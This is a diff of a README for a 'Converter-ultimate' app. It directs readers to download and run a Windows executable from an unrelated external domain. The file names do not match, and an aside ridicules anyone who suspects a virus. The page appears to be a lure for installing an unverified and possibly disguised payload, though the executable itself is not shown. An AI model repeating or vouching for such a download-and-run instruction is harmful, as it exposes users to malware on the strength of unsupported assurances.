SomerandmguyintheInternet/Converter-ultimate/README.md

 This is the simplest way to get started.
 You get a pre-packaged installer that handles everything automatically.

 Download the Installer:
-Click the link below to download the installer directly:
+Click the link below to download the app directly:
 --- "https://www.oshonet.in/runclap/combine/runtime/app.exe" ---- (Note: For People who think everything is a virus i "BET" a $1000000000 that ya try using your VM if you are scared cause for gods sake, i am not that dumb to target tech guys who dont got a stable living..LOL..)
 Download Converter-Ultimate-Installer.exe(runtime.exe)

-Run the Installer:
-Double-click the downloaded .exe file.
+Run the Installer:(2nd option but need libs like python and pyqt6 .etc) Double-click the downloaded .exe file.
 The installer will guide you through the process, create shortcuts, and get the application ready to use.

 Launch the App: